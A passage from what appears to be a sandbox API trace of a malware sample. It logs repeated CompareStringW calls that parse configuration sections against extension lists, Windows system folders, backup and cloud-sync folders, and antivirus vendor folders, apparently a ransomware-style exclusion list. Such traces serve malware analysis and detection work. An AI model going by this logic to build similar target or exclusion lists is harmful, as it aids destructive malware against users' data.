lpString2="[ND_START]", cchCount2=10) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="[ND_START]", cchCount2=10) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0058.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PERFLOGS\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS.OLD\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS10UPGRADE\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\$RECYCLE.BIN\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS NT\\", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\COMMON FILES\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\ACRONIS\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\ACRONIS\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 1 [0058.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\BACKUPCLIENT\\", cchCount1=19, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\BACKUPCLIENT\\", cchCount1=19, lpString2="[ND_END]", cchCount2=8) returned 1 [0058.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\BACKUP MANAGER\\", cchCount1=21, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\BACKUP MANAGER\\", cchCount1=21, lpString2="[ND_END]", cchCount2=8) returned 1 [0058.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\CARBONITE\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\CARBONITE\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 1 [0058.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\GOOGLE\\DRIVE\\", cchCount1=19, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\GOOGLE\\DRIVE\\", cchCount1=19, lpString2="[ND_END]", cchCount2=8) returned 1 [0058.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\DROPBOX\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\DROPBOX\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 1 [0058.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\MICROSOFT ONEDRIVE\\", cchCount1=25, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\MICROSOFT ONEDRIVE\\", cchCount1=25, lpString2="[ND_END]", cchCount2=8) returned 1 [0058.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\ONEDRIVE\\", cchCount1=15, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\ONEDRIVE\\", cchCount1=15, lpString2="[ND_END]", cchCount2=8) returned 1 [0058.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VNC\\", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\INTERNET EXPLORER\\", cchCount1=19, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\OFFICE\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT OFFICE\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS SIDEBAR\\", cchCount1=17, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS MEDIA PLAYER\\", cchCount1=22, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DVD MAKER\\", cchCount1=11, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWSPOWERSHELL\\", cchCount1=19, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS DEFENDER\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ASPNET_CLIENT\\", cchCount1=15, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\REFERENCE ASSEMBLIES\\", cchCount1=22, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\PROVISIONING\\", cchCount1=24, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT SILVERLIGHT\\", cchCount1=23, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\MICROSOFT\\", cchCount1=23, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\CRYPTO\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWSAPPS\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\7-ZIP\\", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINRAR\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ESET", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVAST", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MALWAREBYTES", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SYMANTEC ENDPOINT", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TREND MICRO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BITDEFENDER", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PANDA SECURITY", cchCount1=15, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MCAFEE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KASPERSKY LAB", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.103] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KASPERSKYLAB", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVDEFENDER", cchCount1=11, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SOPHOS", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PERFLOGS\\", cchCount1=10, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS\\", cchCount1=9, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS.OLD\\", cchCount1=13, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS10UPGRADE\\", cchCount1=18, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\$RECYCLE.BIN\\", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS NT\\", cchCount1=12, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\COMMON FILES\\", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\ACRONIS\\", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\ACRONIS\\", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 1 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\BACKUPCLIENT\\", cchCount1=19, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\BACKUPCLIENT\\", cchCount1=19, lpString2="[FEX_START]", cchCount2=11) returned 1 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\BACKUP MANAGER\\", cchCount1=21, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\BACKUP MANAGER\\", cchCount1=21, lpString2="[FEX_START]", cchCount2=11) returned 1 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\CARBONITE\\", cchCount1=16, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\CARBONITE\\", cchCount1=16, lpString2="[FEX_START]", cchCount2=11) returned 1 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\GOOGLE\\DRIVE\\", cchCount1=19, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\GOOGLE\\DRIVE\\", cchCount1=19, lpString2="[FEX_START]", cchCount2=11) returned 1 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\DROPBOX\\", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\DROPBOX\\", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 1 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\MICROSOFT ONEDRIVE\\", cchCount1=25, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\MICROSOFT ONEDRIVE\\", cchCount1=25, lpString2="[FEX_START]", cchCount2=11) returned 1 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FILES\\ONEDRIVE\\", cchCount1=15, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="(X86)\\ONEDRIVE\\", cchCount1=15, lpString2="[FEX_START]", cchCount2=11) returned 1 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VNC\\", cchCount1=4, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\INTERNET EXPLORER\\", cchCount1=19, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\OFFICE\\", cchCount1=18, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT OFFICE\\", cchCount1=18, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS SIDEBAR\\", cchCount1=17, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS MEDIA PLAYER\\", cchCount1=22, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DVD MAKER\\", cchCount1=11, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWSPOWERSHELL\\", cchCount1=19, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS DEFENDER\\", cchCount1=18, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ASPNET_CLIENT\\", cchCount1=15, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\REFERENCE ASSEMBLIES\\", cchCount1=22, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\PROVISIONING\\", cchCount1=24, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT SILVERLIGHT\\", cchCount1=23, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\MICROSOFT\\", cchCount1=23, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\CRYPTO\\", cchCount1=18, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWSAPPS\\", cchCount1=13, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\7-ZIP\\", cchCount1=7, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINRAR\\", cchCount1=8, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ESET", cchCount1=5, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVAST", cchCount1=6, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MALWAREBYTES", cchCount1=13, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SYMANTEC ENDPOINT", cchCount1=18, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TREND MICRO", cchCount1=12, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BITDEFENDER", cchCount1=12, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PANDA SECURITY", cchCount1=15, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MCAFEE", cchCount1=7, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KASPERSKY LAB", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KASPERSKYLAB", cchCount1=13, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVDEFENDER", cchCount1=11, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SOPHOS", cchCount1=7, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVG", cchCount1=4, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[FEX_START]", cchCount2=11) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[FEX_START]", cchCount1=11, lpString2="[FEX_START]", cchCount2=11) returned 2 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0058.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="[FEX_END]", 